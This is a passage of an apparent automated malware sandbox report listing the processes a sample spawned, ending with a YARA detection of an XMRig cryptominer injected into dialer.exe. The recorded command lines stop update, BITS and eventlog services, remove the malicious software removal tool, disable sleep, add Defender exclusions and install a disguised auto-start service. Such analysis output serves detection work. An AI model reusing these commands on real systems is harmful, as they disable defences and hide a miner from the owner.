                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:20
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:22
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:23
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:26
                                                                              Start time:04:16:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:04:16:03
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe delete "GeekBrains"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:04:16:03
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff6156c0000
                                                                              File size:906'240 bytes
                                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:30
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:31
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe start "GeekBrains"
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:36
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff654c90000
                                                                              File size:59'456 bytes
                                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:37
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\Screenshots\Lightshot.exe
                                                                              Imagebase:0x7ff6e4d80000
                                                                              File size:2'876'416 bytes
                                                                              MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 66%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:04:16:04
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:41
                                                                              Start time:04:16:05
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"dwm.exe"
                                                                              Imagebase:0x7ff79d4a0000
                                                                              File size:94'720 bytes
                                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:42
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6218c0000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:43
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:44
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:45
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:46
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\wusa.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                              Imagebase:0x7ff6085f0000
                                                                              File size:345'088 bytes
                                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:47
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:48
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:49
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:50
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:51
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop bits
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:52
                                                                              Start time:04:16:06
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:53
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\sc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                              Imagebase:0x7ff6bbbe0000
                                                                              File size:72'192 bytes
                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:54
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:55
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:56
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:57
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:58
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:59
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:60
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\powercfg.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                              Imagebase:0x7ff645cd0000
                                                                              File size:96'256 bytes
                                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:61
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:62
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:63
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:64
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:65
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\dialer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dialer.exe
                                                                              Imagebase:0x7ff64c5c0000
                                                                              File size:39'936 bytes
                                                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                              Has exited:false

                                                                              Target ID:66
                                                                              Start time:04:16:07
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7e52b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:67
                                                                              Start time:04:16:08
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
